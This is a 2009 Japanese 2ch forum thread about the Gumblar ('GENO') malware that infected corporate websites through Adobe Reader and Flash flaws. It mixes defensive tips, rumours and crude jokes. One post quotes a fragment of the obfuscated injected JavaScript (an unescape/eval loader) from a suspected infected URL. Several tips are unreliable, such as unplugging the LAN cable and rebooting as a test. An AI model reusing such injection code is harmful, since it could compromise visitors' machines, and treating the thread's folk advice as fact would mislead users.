JSという略称はすでに「ジャストシステム」が持っている。
「JaSc」という略し方はどうだろう？

このウイルスより、断然悪質なウイルスが小林

糸ようじ、なまら人気だな

マスクを付けろ、マスクを。

製薬会社で感染(笑)

ウィルスその後に

avast入れてみて、>>619の烏骨鶏のサイトアドレスをぐぐってみたら
ぐぐるの検索結果ページで変なメッセージと警告窓発動
これってどういう事？ぐぐっただけでもアウトなの？

今のところcmd・regedit起動可能、sqlsodbc.chmは50,727
電源落とすの怖ええぇぇ・・・

>>630
クレカは保険効くから問題無いだろ？
まぁ、インフルよりこっちのウイルスが蔓延した方が
保険屋は涙目になるかもしれないけどｗ

これ検索サイトがやられたら大変なことになるなｗｗｗｗｗｗｗｗｗ

ヤフー　グーグル　とかマジで頼んだｗｗｗｗｗｗｗｗｗｗ

俺もヤバイｗｗｗｗｗｗｗｗｗｗ


会社のシステム管理の俺も２年ぶりについに動く時が・・・。
社員に嫌な顔されるわ。笑

>>646
火狐使ってるだろ？

>>649
うん

>>650
先読み機能を切れ

これって、ひょっとして、グーグル大打撃？

グーグル検索怖くなって、最近避けるようになってきた。

>>651
どうやるの？

>>653
1. ロケーションバーに"about:config"と入力してEnterキーを押す。（入力する際に「"」は不要）
2. フィルタに"network.prefetch-next"と入力してEnterキーを押す。（入力する際に「"」は不要）
3. 値が"true"な場合は"true"をダブルクリックして"false"にする。（初期設定値は"true"）

先読み切らないと検索トップに感染サイトの名前が出ただけで感染！
ってどっかのスレで読んだ。

スーパーハカー現る

>>654
ありがとう

糸ようじ菌に感染。

>>651
まとめサイト見に行ってた、先読み機能もなんとかOFF官僚
サンクス

AVGじゃ検知されんのか･･･avestに切り替えるしかないか･･･。

セキュリティ板で暴れまくってる同人サイトの腐女子見てると

イラッと来る

>>660
ベストを尽くしてくれそうな良いソフト名だな

これJaneでjpgのリンク踏んだだけで感染するのかすら？

5 名前：192.168.0.774[sage] 投稿日：2009/05/18(月) 16:11:47 ID:ua7Ctj4Z0
>>1
テンプレの症状にある「再起動時にBSOD」は、
起動時にLANケーブルが抜かれていたり、IPブロックされていると
攻撃者のIPに繋がらないため、クラッシュさせる挙動だそうです。

22 名前：192.168.0.774[sage] 投稿日：2009/05/18(月) 16:30:30 ID:eOHkXG3n0
>>5
起動時にLANケーブルがついていたり
IPブロックされていなければ、
攻撃者のIPにつながるから、クラッシュさせる挙動をとらない
ということになるの？



692 名前： ビオラ(宮城県)[sage] 投稿日：2009/05/18(月) 16:37:39.34 ID:nQjoclSR
>>689
ウィルス引いたらLANケーブル抜けっていう初歩対処に対しての報復か
つくづく手が込んでる

767 ：本当にあった怖い名無し：2009/05/17(日) 16:24:24 ID:sIzAEXxG0
Firefoxだと検索するだけで感染するから恐ろしい

現在拡散している Gumblar.cn
zlkonの亜種ですが以下のような特徴を持っています。

インジェクションコードが難解になった
バージョンチェックをユーザ側で行うため、サーバスクリプトの検出を回避している

　※一部のIDSはサーバスクリプトへのクエリを監視しており、クライアント側でやられても判断できない

感染が容易と思われるPC環境をよりピンポイントに判断している（このため、セキュ各社の自動検出が難しくなっている）
感染しない環境には何も返さない（更に検証が難しい）

亜種の「更新」の頻度が異常にすばやく、
亜種がほとんどのセキュソフトを潜り抜けているので、シグネーチャ・ベースでの検出が難しい
　

※検出率が上がる頃には次の種類になっている

つくづく手の込んだウィルスだなぁ

製作者の努力の結晶か

人間、頑張って努力すれば、ここまで凄い事が出来るんだね！

この努力を他の事へｒ

>>667
以前もLIRVAとか複合的な最強最悪ウィルスってあったからな。
世界的に偽札作りと同じくらいの重大犯罪として対処しない限り、
もっと強力なのがいくらでも作られる。

もう糞ニートプログラマの就職活動に付き合わされるのは嫌だお・・・

おそろしい

早くセキュリティ会社もなんとかしてほしい
確認とって今は自分いいけどさ

http://www.so-net.ne.jp/security/news/view.cgi?type=2&log=top

■商標登録ホットライン

商標登録専門サイト「商標登録ホットライン」を運営する大槻国際特許事務所（大阪市東淀川区）は15日、
同サイトが改ざんされていたことを明らかにした。

■アイマジック

ゲームソフト制作のアイマジック（本社：神奈川県）は14日、同社サイトの一部が改ざんされていたことを明らかにした。

■BIG-server.com、再び改ざん

ゼロ（札幌市厚別区）が運営するレンタルサーバーのBIG-server.comは14日、
「maido3.com」ホームページ内の「【ぷろじぇくと ぞうさん】〜E-Bananaサーバ 構築日記〜」の
トップページが改ざんされていたことを明らかにした。

■ミュージック・オン・ティーヴィ

衛星放送の音楽専門チャンネルを運営するミュージック・オン・ティーヴィ（本社：東京都港区）は14日、
同社サイト「MUSIC ON! TV」の一部が改ざんされ、不正なスクリプトが埋め込まれていたことを明らかにした。

■ライブハウス あさがやドラム

ライブハウス あさがやドラム（東京都杉並区）のホームページが改ざんされていたことが分かった。

■小林製薬

小林製薬（本社：大阪市中央区）は12日、同社サイトの一部が改ざんされていたことを明らかにした。

（2009/05/18 セキュリティ通信）

普通に、Flash Player アップデートすれば解決だろ、JK。

flashとreaderアンインストール
これに勝る物はないのだよ、ヤマトの諸君

>>670
このウイルスってどのくらいの価値（損害）があるんだろう、貨幣的に

とりあえずFlash Player最新にしてAdobe Readerアンインスコ
pdfなんか使わねえしもうイラネ

>>677
米ScanSafeは、「gumblar.cn」がばらまいた悪質なファイルは、
ボットネットからの命令を待つためのバックドアをインストールするようだとしている。

ボットネットとは、悪意のある攻撃者によって構築され、
インターネット経由の命令によって遠隔操作をされてしまっているコンピュータ群のことである



思うままに何万というコンピュータを操作して情報取り出せるならその価値プライスレスじゃ？ｗ

firefoxの連中は先読み機能で即死か？

製薬会社でウイルスとはｗｗ

俺のＰＣが遠隔操作されて
「個人情報来たアルよ・・・」
「アイヤー男の裸ばかりアルヨ！　隔離アルヨ」

ふふふ、ボットの愚か者が

そういや、おとといあたりから　ようつべに繋がりにくいんだが、あそこも　感染ルンです？

金盾

mixiのトップページとか感染したらえらいことになるな

小林製薬って変態新聞スポンサーで
オカ板の呪いかかってたな

ノートンも対応したとか聞いたけど、今のところ対応してるのは
avastとノートン（未確認）だけ？

これって、感染してる人がhtmlをftpでアップロードすることによって
感染サイトが一丁上がりって感じ？

>>372
ああ、こうやって感染するのか。

そもそもの発端はここらしいが、未だに対処なしか？

リボンマジック公式サイト
このサイトはコンピュータに損害を与える可能性があります。
このたび、諸般の事情により『Kram〜サヨナラによく似た時計の音楽〜』のリボンマジックでの ...
リボンマジックの次回作につきましては、準備ができ次第、当サイトで発表いたします。
今後とも、リボンマジックへのご愛顧のほど、よろしくお願いいたし ...
www.ribbonmagic.com/ - 類似ページ

リボンマジック BBS
このサイトはコンピュータに損害を与える可能性があります。
リボン マジック公式サイト☆ リボンマジックの公式サイトへようこそ。
ゲームの紹介、情報等。18禁乙女ゲームメーカー。
www.ribbonmagic.com/FS-APL/FS-BBS/index.cgi?Code=bbs - 類似ページ

ミクシーもフラッシュたんまり使っているんだよねぇ。

GENO様曰く、「キャッシュ削除すりゃ大丈夫」だろ。
お前ら心配するな。

それはそうとアンチウイルスソフトを過信するなよ。
結局は自分次第だ。

まとめ見たりチェックしたりしたけど
もう面倒くさくなったのでAdobeはアンインストした。
動画サイト見れなくなったけど気にしないｗｗｗ

同じくadobeの全部抜いたｗ
感染しないですむならそれでおけ
動画はワクチン出来てから見るよ

火狐でジャバスクリプトも切ったしノースクリプト入れた
ぐぐる先生の先読み機能も切った
２ちゃんは専ブラのみ、ふらふらネサフするのはヤメ
これで感染したら悲しすぎる。

・・・ダチに小林製薬のホムペがウイルス食らってやべーらしいぞと言う話を聞いて、わざわざ覗きにいっちまった。
数日前の話だが・・・



くそっ、小林製薬はフェミニーナ軟膏をカユマンコナオールに改名しろ！

パソコンを起動したら変な音が聞こえてきたんだが。
気になって音量マックスにしたら外国男がハァハァ言ってる
アバストでウイルス検査してもなにも出てこねーし。身に覚えが腐るほどあるだけに恐いよ

閲覧だけじゃ無理だろ
特にトロイだと、埋め込まれた実行部が仮想ファイルかなんかで起動しないと動くわけないし。
下手なプラグインとか入ってるからじゃないの？　javascript有効とかさ。

>>696
それたぶんマイケルだな。

テレビ局の陰謀だな
ネットの方がおもろいしテレビなんて見てねーよｗｗｗ
なんていってるから

>>698
コンセントに足引っかけて転ぶだけじゃないんだなｗ

adobe Flashのアップデートってどうやるの？
普通にインストールすればアップデートしてくれるの？

プロンプトもregeditも起動するからセフセフか
つかgeno問題拡散してたのかよwww

>>702
亜種だとそこは問題なくとも感染してたってのあるみたいだから
気になるなら対策やってるとこいって調べたらいい

>>698
俺はホモでもショタでもねーぞ！ロリコン一筋だ。なんでマイケルが俺のパソにいつくのか小一時間説明して貰おうか

>>699このウイルスは海外産

>>701
インストールしたいブラウザで
http://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
にアクセスしてバージョンチェックして
そこにあるリンクから
ダウンロード→アップデート→フラッシュプレーヤに移動してインスコ。


普段Firefoxしか使ってないから確認したら、IEのフラッシュバージョンは９だったｗ

いちごきんたまとコレどっちが兇悪？
こっちか

ようつべ見て感染することはあるんでしょうか？

トップページの左上、 Flash　playerのバナーをクリックすれば勝手に最新
がダウンロード。

右上だった

去年のPWN to OWNの結果を知るべきw

え、もしかしてブラウザごとにフラッシュバージョン上げないと駄目なの？
いつもオペラだからオペラしかバージョン上げてないんだけど…
IEもスレイプニルもfirefoxも入れてるんだけど。。

>>712
フラッシュとアクロバットリーダの隙をついてるので
全部更新しないとだめ。

一番簡単に感染を判定するには
LANケーブルを抜いて再起動すればいいんだな

foxit　Reader使ってる俺は勝ち組？

>>714　>>664

>>703
なるほどありがとん
まあたまに強力なウィルスがでてくるのはネットの醍醐味だが
面倒だからかかりたくはないな

>>713
ありがとう、今から全部更新してくるorz

>>707
感染のメカニズムはこっちの方が凶悪だけど、
感染後の挙動は、いちごの方が凶悪じゃない？

フラッシュプレイヤーが最新で、
アドベリーダーってのが、9.1なら大丈夫ってことか？

>>695
台風の日に用もないのに海岸に行って波に飲まれるヤツだなｗｗｗｗ

>>720
283 名前： チドリソウ(dion軍)[sage] 投稿日：2009/05/18(月) 22:18:14.02 ID:fFtL8VLz
なあお前ら、念のために聞いておくが・・・

AdobeReaderを8以前から最新の9.1にアップデートして安心してないよな？
普通にAdobeからダウンしただけでは9.1.0がインスコされる。
しかしこれではGENOウィルスに無防備。

9.1を起動してアップデートすると9.1.1になる。
これがGENOウィルス対策版だ。

前にセキュリティー関連のポッドキャストでsandboxieってソフトを薦めてたよ。VMとはちと
違うんだが、sandboxという隔離された領域をつくって、その中だけでブラウザとかを
動作させるのでブラウザ経由で変なものがインストールされても、それはsandboxの外には影響を
与えんという触れ込みのソフト。うちはosが非対応だから使ったことがないが。

>>706
> 普段Firefoxしか使ってないから確認したら、IEのフラッシュバージョンは９だったｗ

まさに俺もその状態で、IEのFlashアップデートしようとしたら
なんかセキュリティのためにActiveX使えなくなってて
アップデートできねえｗ
セキュリティレベル最低にしてもActiveX使えないってなんなんだｗ

>>722
なるほど
9.1.1/8.1.5/7.1.2のどれかなら（一応）対策されてるってことか？

天使の耳かきの情報を見るために、5月頭にサイトを見てたぜ
こわいこわい

Ｗｅｂ業界の人間は洒落にならんワームだよなあ
もっと騒ぎになって良いはずなのに、なんでこんな水面下進行なんだろ

フラシュプレイヤーの方は10,0,22,87でいいのかな？ω？

フォトショップアンインストールしてて暫くみれなくてもいいやーと思っていたpsdファイルが
フラッシュプレイヤー入れて見れたのにびびってプレイヤーもアンしたところだった
勝手に関連づけるのね
Vistaだから？
まあ今回は助かったようだけど

>>728

たぶんOK

�d
まぁ、一応最新版にしたけど
俺の使ってるAVG君が対応するまでネット巡回は避けるわ〜

ちょっとサイトの様子を見てくる

家政婦は見た。そのサイトを。

>>732
無茶しやがって・・・・

>>727
業界人の中でも、ちゃんとした知識を持っているヤツはともかく
その周辺で玄人気取りなヤツが問題なわけで。

横から見た対処法を、勘違いで覚えて実行されて大惨事とか、冗談じゃねぇや。

だから慌てず騒がす、静かにやらざるを得ない。

これって、Spybotとかspyware Brasterとかではじけないのかな？

>>732
必ず帰ってこいよ……！

>>732
二階級特進

某サイトの様子を携帯からそっと覗いたら、
そのサイトのブックマークのリンクが
大量に消してあった。

こえぇぇ。。

avast先生がこれだけ心強く思えたことはない

化石のMe使ってる俺はどうすれば・・・
とりあえず、レジストリエディタは立ち上がった。
cmd.exeは無いので
MS-DOSプロンプトで「dir C:\WINDOWS\system32\sqlsodbc.chm」を探したら無かった。

AcrobatReaderはアンインスコ
火狐のJavaスクリプトは切って、先読みも外した
Flashは残念ながら9までしか入らん

あーヤダ、めんどくせぇ

そもそも無ければ心配しなくても良かったのでは

>>635
あつものとか、なますとか、難しい漢字使うな。
つか、なますはともかく、あつものって何？
やっぱ熱いもの？
羊羹ってジンギスカン？

羹（あつもの）は要するに肉やら野菜やらの入った熱い汁物のこと。
羊羹とはその名の通り羊のあつもので、冷えるとゼラチン質のせいで固まった。
肉の食えない坊さんが、小麦粉やら葛粉と小豆でそれを模して作ったのが今の日本の羊羹。

今朝からavastがクルクルしなくなったのだが・・・

adobe自体入れてないんだけど大丈夫？

>>745
変わりにお前の頭がクルクル回ってるから安心しろ

>>745
更新するとクルクルする

http://www.alexa.com/search?q=gumblar.cn

alexaの人気サイトに絶賛ランクイン中ｗ　現在588,338位
martuz.cnはランク外だな

いつまで続くんだこれ？
束縛された
いんたーねっつは不便でしょーがねぇ

なんでニュー速＋ではこんな盛り上がってないの？
皆気づいてスルーしてるんならいいけど、
全然気づいてない人も結構居るんだろうなぁ…怖いよ。

スレタイがよろしくないのかねぇ

こわいなあ

>>751
企業側からすれば感染して攻撃側になった事実を認めると
イメージダウンどころか訴訟になりかねんからな
テレビのほうにも圧力かけてるんだろう

>>55
これすごいな
ターミネーターでスカイネットが戦争始めたときみたいだ

大変なニュースなのに、テレビ、新聞大手メディアは完全スルーだな。

プリウス新発売のニュースなぞほっとけ

>>755
感染したボットネットがいまどのくらいの数いるんだろう．
それらにどんな指示を出すんだろう．
パソコン通信黎明期から見てきた．
軍事ネットが学術ネットになり，商用可されてインターネットになるのも見てきた．
色んな混沌闇をみてきた．

次はネットそのものが闇に？

>>757
数百万とも数千万とも。で、それを闇売買しているそうだよ。

バスター仕事しろ

ようやく関連スレっぽいの建ったなage

わたし昨日小林製薬のサイト見たけど
昨日は大丈夫だよね

>>751
同人スレでは盛り上がりのピーク越えたかな?w

まぁあそこは内容ループ地獄だがwww

>>762
同人板の奴らは人間としてダメなのばかりだからな。
被害妄想爆発させてるだけで、感染拡大防止なんて全く頭にないみたい。

765 名前：192.168.0.774[sage] 投稿日：2009/05/19(火) 12:23:36 ID:kGobtrBpP
ちょい報告、ガイシュツだったらすまん。

全ての対策をおこなったPCでGENO感染したサイトを訪問
　↓
avast!が遮断
　↓
念のためavast!およびカスペ・バスターのオンラインでフルスキャン
　↓
C:\WINDOWS\system32内に「system32.exe」が作成されているのを発見
　↓
「system32.exe」の更新日時は2005年だが、作成日時はGENO感染サイト訪問時
　↓
ヒューリスティック予測で「system32.exe」の疑わしい挙動を検出


とりあえず「system32.exe」は除去したが、まだ何かが潜んでいそうだ。
おまえらもC:\WINDOWS\system32を調べてみれ
ちなみに既知の「system32.exe」を作るワームとは別物。

766 名前：192.168.0.774[sage] 投稿日：2009/05/19(火) 12:32:23 ID:8FgxAqIl0
未感染PCではSystem32.exeは存在しないな

GENOウィルス流行る
　↓
セキュ板住人（兼同人板住人？）が初代スレ立てて広報してくれる
　↓
意味が理解できず、板違いと叩く人などが出てくる
　↓
理解して不安になった人が、なぜか質問スレではなくセキュリティ板のGENOスレ（分析や議論しているとこ）に押しかけて質問攻めする
　↓
セキュリティ板のGENOスレでは同人板へ帰るよう誘導（その代わり同人板へ出張して質問に答える）
　↓
同人板住人、なぜか質問に答える人を叩きだす（最初は自分も質問してたくせに...）
　↓
同人板のスレからは今北さんを追い出し、他板に押し付けようとする人が演説を始める
　↓
「質問禁止にしよう、質問は他板へ誘導してやれ！」と極めて自分勝手な理屈を述べだす
　↓
「ハザードマップ作成や検体確保のために感染URLを公表して欲しい」との要請に対し、「凸が怖い」と保身を優先して拒否
　↓
他板、同人板住人のあまりに自己中心的なDQN行為に驚愕する
　↓
自己中を批判する人、腐女子嫌いで便乗叩きする者などが押し寄せる
　↓
なぜか全てをセキュリティ板の仕業と勘違いした同人板住人が逆恨みでセキュリティ板を荒らす
　↓
状況をみて面白がった厨房たちが、同人板・セキュリティ板ともに便乗荒らしをはじめる
　↓
セキュリティ板は同情され、同人板は嘲笑と侮蔑の的となる
　↓
VIPを中心に、801同人サイトを版権者へ通報＆凸晒し祭りの準備が始まる　←New！

>>741
俺98se
レジストリエディタなど両方とも立ち上がったし、一応大丈夫だとは思うが…
収集するまで専ブラで2ch見るだけになりそう

>>741,766
9x系はsystem32ディレクトリじゃなく、systemディレクトリを調べる

こうして見るとロクなスレ無いなあ

systemディレクトリも問題なしでした

>>741
98はcommandでコマンドプロント起動できるけどMeはそうじゃないのかな？

>>769
Meでも、commandで立ち上がるよ。

ちなみに、アドビ　フラッシュとか、バージョン８までしか対応してなかったと思うんだけど。
俺、バージョン９入れたら、Firefox起動時に「カーネル３２が〜」と出て、８に戻したよん。

>>757
今はひたすらボットを増やしているだけのように見えるな。
ボットネットの親玉が、何を狙ってるのか気になる。。

どうバカホイホイｗ

>>773
糸ようじスレと聞いて

・・・なんてふざけてる場合じゃないんだが、
どうバカは反応せざるを得ない。

>>764
system32.exeが作成されるってのはマジ？

>>774
マジ。
被害者がポツポツ出てきている。
日本で使われてる多くのセキュリティソフトは対応していない。

これの亜種な。
http://www.virustotal.com/jp/analisis/138404683259a191c78642e22bdaf4ab

system32.exeがsystem32フォルダ以外にも作られた報告が出てるな。
あと検索してもファイルは出てこないが、プロセスではsystem32.exeがしっかり活動しているという。
system32.exeを展開した本体は別の場所に潜伏してるだろうし・・・

GENOウィルスの作者は何重にも手の込んだことをしてるので、かなりやっかいだ。

>>765
あ〜・・・、だから板全体が荒れてたんだ・・・

>>776
まさに努力の賜物だよな。

まだ終わってないんだよなぁ
怖すぎだろ

>>778
LAN切断するとシステムをクラッシュするという、怨念たっぷりの努力だもんなあ・・・

終わりはないさ
セキュリティに穴がある限り盗み出す情報がカネになる限り無くなることはない
むしろもっとひどくなるだろうな

製薬会社にコンピュータウィルスというギャグ・・・・？　と思ってきてみた

もはやギャグにならないレベル。

>>782
ギャグだと思ったら全然違って
あちこちのサイトが感染してるらしいので対策を講じても
ウイルス対策ソフトが全然対応してないのに愕然としてる。

家族で共用してることもあって一応警戒はしたがありゃだめかもねぇ

なんでトレン○マイクロ使ってるのかわかんね

あげろ、あげるんだ、ジョー

>>765
すげーな…

GENOっすか
すごい勢いで広まってるね

>>776
そもそも正規windowsにsystem32.exeなんてあるの？

FTPクライアント搭載なのが斬新だな。
パスワード平文だし。(SFTPは知らんが)
そのうちメール自動ハックとか出るんだろうなぁ。

ズブの素人に出来ることは、このスレをあげることくらいっす。
あとは行き着けのスレでの広報。

ニュースでさっぱり取り上げないのが
逆にこえーな

>>789
さっき検索してみたけど無かった

>>1

ウィルスに犯される製薬会社ってシャレにならねぇなw

>>696
そういうのは多分一時ファイル消したらでてこなくなる。

そろそろカスペルスキーあたりがワクチン作らないかな
一応FlashとReaderは最新だけどなんか怖い

>>794

自然発生の根拠を立証する責任もあるでしょ。

ウイルス発生の原因や元の話が一般には知られてないのがむしろおかしいでしょ。

対処療法してればいいってそんな無責任なことはない。

>>793
一行目に突っ込んでみたがやっぱりないのか
タスクマネージャでもシステムフォルダでも見たこと無いから気になったわ

えーと
今、うちのXP、変な音だして逝っちゃいました

>>799
暑かったからじゃね？

(´･ω･`)GENOｳｲﾙｽに感染したせいで童貞になりました
おのれ憎きGENOｳｲﾙｽめ!!

感染する前は非童貞だったの？

>>800
だよね？心当たりないもん
YOUTUBEみるくらいしか使ってないもん

ニコニコの祭り？で、GENOウイルスを誤検出させるウイルスコード（無害）が
そこらじゅうにコピペされまくってる模様

>>804
何かよく分からないけどｋｗｓｋ

>>798
system32フォルダにsystem32.exeがあっても不自然じゃなくね？
・・・という意図のファイル名だと思う。
現時点ではsystem32.exeが存在した時点でウィルス感染が確定。
本体はたぶん別のところに潜伏してるので削除するだけじゃダメ。

糸ようじ大人気だな

>>805
【演奏してみた】中村イネについて語るスレ 2頭目【馬】
http://pc12.2ch.net/test/read.cgi/streaming/1242711324/

ここの252あたりから読むとｋｗｓｋなれるかも

>>780
＞ LAN切断するとシステムをクラッシュする

うわ、まじか。

>>765
＞ GENOウィルス流行る
＞ 　↓
＞ セキュ板住人（兼同人板住人？）が初代スレ立てて広報してくれる
＞ 　↓
＞ 意味が理解できず、板違いと叩く人などが出てくる

まずこの時点で頭の悪さがパネェなｗ

>>780
よくわかんねーけどすげー

>>811
ウイルス感染したら被害拡大させないためにもまずネット回線引っこ抜けって言うだろ？
それして再起動したらサヨウナラってことよ

>>810
同人板のマジキチぶりは異常。
無知な同人板住人の代わりに質問に答えてた人を袋叩きにするわ、
被害妄想と排斥心の塊になって↓みたいな意味不明なテンプレ作るしｗ

＞※書き込む際は、名前欄にはGENO#GENOと入力してください。

このスレね。
【質問禁止】同人サイト向け・GENOウィルス注意9【報告専用】
http://changi.2ch.net/test/read.cgi/doujin/1242651321/

GENOウィルス
win Xpの場合
sqlsodbc.chmのバイト数　50727ならokであろうと言われている。

win 2kの場合sqlsodbc.chmは存在しない。
有った場合削除。
又
ファイル名を指定して実行⇒cmd で変なら疑うべき。

>>690
GENOウイルスチェッカー
危険度0%
安全なURLです。踏んでも大丈夫でしょう。
評価ミス報告

戻る


もう大丈夫みたい

このサイトもAvastが激怒するんだがやばいのか？
ttp://jwy.jp/mobile/?jb=freepage-view&freelink=16

>>816
`2fscr`69pt`3e`22)`3b`7d';var GvYX=unescape(ayY.replace(/`/g,'%'));eval(GvYX)})();

まっくろくろすけっぽいね

>>727
> Ｗｅｂ業界の人間は洒落にならんワームだよなあ
> もっと騒ぎになって良いはずなのに、なんでこんな水面下進行なんだろ

Web屋は「ｶｺｲｲ俺様」が最優先価値だからじゃないか？

感染したらクノーピクスでデータ救出はできるのでしょうか

>>814
それは既に古い。
新しい異種はそれでは判別不可能。

>>819
出来る。

>>816
なんだ　単なる無修正画像か。

ノートン先生が5/18付のウイルス定義で対応したみたいだよ。

>>821
ありがとう。安心しました。

そういやこの前同僚のPCが妙な動きしてたな・・・
フリーズしたので電源切って強制終了＞再起動＞しばらく操作受け付けず無反応
しばらくすると何事も無かったように動き出した

何か関係あるのだろうか・・・

>>816
GENOウイルスチェッカー
危険度1000%
超絶危険なURLです。友人のPCを壊すのに利用しましょう！
絶対に踏んではいけません。
評価ミス報告

戻る

踏んだだけでPCぶっ壊れるとか半端じゃないな

現実世界でもインフルで大変なのに電脳世界でもインフル並のモノが来るとはな

もうわけわかんなくて怖いから
ネットは携帯とｍｅたんだけで繋ぐようにするわ

てかニュ速＋はどのウイルススレもスレタイが緊急性を感じないわ

> 1.「同サイト」を管理していた「社内PC」1台にコンピュータウイルスが感染

要するに、コンピュータ知識もなくウェブサイトの取り扱いをやってた
マカーのWeb屋が死亡するってことかｗｗｗ
ざまあｗｗｗｗ

意味不明

なんでマカー

そろそろ世界規模でセキュリティ会社と政府機関で手を組んで対ウイルス連合作らんと
まずいんじゃね？
バスターやノートンとか複数のソフト入れると同士討ちと殺し合いやってＯＳまで動かない
とかじゃもう論外ぽ

こえ〜。
今更知ったぞこれ。
とりあえず自分のPCとサイトは無事っぽい。

あとは会社のPCか・・・

何でこのスレこんな静かなの

ジェノサイ・

Javaスクリプトを常に切ってれば、大丈夫？

よくわからないけどadobeをアンインストールすればいいの？

>>161
マカーは大丈夫なん？

>>835
スレタイかなあ・・・

これの恐いところは安全だったサイトが次の日には感染してるかもしれんってとこだな。

ノートン先生使えねぇ、と切ったばかりなのに
ここにきて本気出すなんて

>>840
だよねー・・・スレタイに「GENO」でも入れてくれてたら違ったかもしれん

そりゃ先生は金とってんだかから、Avastに遅れとったままとか許されないだろ

新型インフルエンザの事とやと思うやろ　パソコンからもかかると思たやんけ

>>39
表示されない＆java有効を求めてくるサイトは「あ、そう」てな感じで閉じちまう。

腐が湧いてこないのはいいんだけどな

あれ？　俺この前コマンドプロンプトが立ち上げられなくなって、
２ちゃんもかちゅ〜しゃだとスレを見れなくなって、
Ad-Aware も更新出来なくなったり
他にも不具合でまくりだったんだけど、
これにやられた？？？
システムの復旧でなおったてるんだが・・

>>845
マスクすれば大丈夫ｗ

>>848
試しにＬＡＮ引っこ抜いて再起動してみればいいんじゃね？
それで無事だったらセーフ
ぶっこわれたら駆除する手間が省けたってことでやはりセーフ

バックアップ完了　まあたいした物は入ってないけど

リカバリディスクどこやったかな…？
カスペルさんが対応してくれる日までリアルでもバーチャルでもウィルスに怯える日々が続きそう

大事件あげ。


日経ITProのホムペで
このPCウィルスのニュースを見つけたけど、
5月15日付けのニュースなんだよなぁ…。
4日ルールでスレ立たんよ。。orz

>>850
駄目だ。やられてたっぽい。
sqlsodbc.chmのファイルサイズも4,096 バイトとか変らしい？し、
adawareもファイル更新できない。
初めてウイルスにやられた。。
アクロバットがいかれてるなぁ、って思ってたんだよな。。
クリーンインストールって、データ全部飛ばしてインストールするしかないのかな・・？

クリーンインストールってのは｢PCを買ったときの状態に戻す｣ってやつだしね…
バックアップとってる？取ってなかったら諦めるしかないかも

しかしなんで好き好んでウィルスなんか作るんだろうな

>>852
日経BPなら今日付けのがあるけど、誰もスレ立てしないだろ？

Adobe ReaderやFlash Playerの脆弱性を突く「Webウイルス」に注意
セキュリティ組織が警告、Webページにアクセスするだけで被害の恐れ
2009年5月19日

http://www.nikkeibp.co.jp/article/news/20090519/153772/

本日、小林製薬のHPに対するマスメディアの警告記事を
見なかったんですが、これは小林製薬からの圧力なんでしょうか？

もし相ならマスメディアの存在意義っていったい・・・・・

>>856
GENOってネーミングがヤバくて放送できないのかもｗ

これ、あんまり話題になってないね。
インフルエンザより気になるよ。

>>855
+で探したら、それっぽいのが・・・
【社会】PDFとFlash Playerの脆弱性を利用し、Web経由で感染するマルウェアが猛威をふるう
http://tsushima.2ch.net/test/read.cgi/newsplus/1242695024/

>>856
ある程度の規模の企業なら、サイト管理にはだいたい広告代理店が噛んでる
マスコミは広告がないと食っていけない

あとはだいたいわかるよな？

>>860
マスコミの存在価値がないことは、分かりましたw

なんて発音するのだろう。

http://urasoku.blog106.fc2.com/blog-entry-694.html
スレとはあんま関係ないけどさ、これはどういう事？

この問題、本当にかなりヤバイのにあまり取り上げられないな。

ウィルス本体はかなりの早さでアップデートされてるから、ウィルス挙動によっては
いつぞやの韓国みたいにインターネットが止まるような事態にすら発展しかねないのだが・・

>>853
大変ですな。

そういう専門的なことは板を変えて質問した方が絶対いいぞ。適切な板を探してみなされ。

AntiVirは偉大だわ。まじ惚れた。

>>864
TVのニュースで取り上げたら、新型インフルの話とごっちゃになって
視聴者が混乱するから控えておこうとかなんとか考えてるような気がしないか？

それにしてもスレタイに緊迫感が全く無いな
Web見るだけでPCクラッシュとか初耳なんだが良くある事なの？

>>868
映画じゃよくあること

>>868
前にも何かあった気がする。
ココまで酷くはなかったかもしれないけど・・・

スレタイが恐怖を煽らないと緊迫感が出ないんではないかい？

【セキュリティ】サイトが改ざん被害、普通に閲覧で史上最悪のコンピューターウィルス感染も

とか？

確かにスレタイが駄目すぎるよな。人目を引かん。
と言う訳でageるぜよ

うちのカスペルさんはブロックしてくれるのか？

どっちに比重を置くかだが
俺は賢い人のアドバイスに従い
さっさと制限ユーザーにした
ウイルス対策ソフトは入れてない

そこは入れておけよｗｗｗ

【セキュリティ】サイト閲覧だけで感染！凶悪PCウィルス被害…ウィルススキャンも効果なし？

情報を簡単にまとめるとこんな感じのようだが煽りすぎかなｗ

>>876
> 【セキュリティ】サイト閲覧だけで感染！凶悪PCウィルス被害…ウィルススキャンも効果なし？
>
> 情報を簡単にまとめるとこんな感じのようだが煽りすぎかなｗ


【セキュリティ】サイト閲覧だけで感染！凶悪PCウィルス猛威…ウィルススキャンも未だ未対応

こんな感じじゃね

立ち上がり時
biosとosの間はロックできる。
問題は　これなんだがね。

>>765
＞VIPを中心に、801同人サイトを版権者へ通報＆凸晒し祭りの準備が始まる　

で、また意味のわからん当て字と身内用語だらけになるのか。
あの妙な身内意識のキモさは、鬼女板の比じゃねぇぜ。
もっと恐ろしいものの片鱗を味わうんだぜ・・・

やっぱし、ダム板が一番常識的でイケメンエリート揃いでいいよな。

どこだってそうだろ。

ほんとコテは糞レスしかしないな

とりあえず、今のとこ感染が疑われる問題は何もないな。しかし、電脳も現実もウイルスにしてやられてるのう。

218 名前：192.168.0.774[sage] 投稿日：2009/05/19(火) 23:44:22 ID:0vthBrIC0
ベクターグッジョブ！
http://shop.vector.co.jp/service/special/security/

こんな悪質なウイルスってもうテロレベルだろ
こういうのって犯人を特定して捕まえるのって難しいの？

ひんと：中国様

ものすごい勢いで広告・宣伝を報告するスレ 167
http://qb5.2ch.net/test/read.cgi/sec2chd/1242102261/365

【セキュリティ】サイト閲覧だけで感染！凶悪PCウィルス猛威…ウィルススキャンも未だ未対応
http://tsushima.2ch.net/test/read.cgi/newsplus/1242546568/

むぎゅぎゅぎゅ。

ヒューリスティックでも捕まえられなかったの？

Vistaでは今のとこ感染しないの？

亜種が出てきてるからなんとも言えない状況
だった気がする

糸ようじで駆除でしょ

>>39
そういうの使わないとサイト作ってる会社が金取る口実にならないからだろ。
画像とテキストだけならビルダー使って自分でやろっかて話になる。

数日前に親用のPC教室のサイト調べてて、あるサイトに飛んだら
Avast!がこのウィルスに反応して隔離してくれた。
たまたまVistaマシンで回ってたし、問題は無かった。

AdobeのReaderとFlash Playerを最新版にして、
JAVAスクリプト切ってFirefoxにNoScript入れれ。

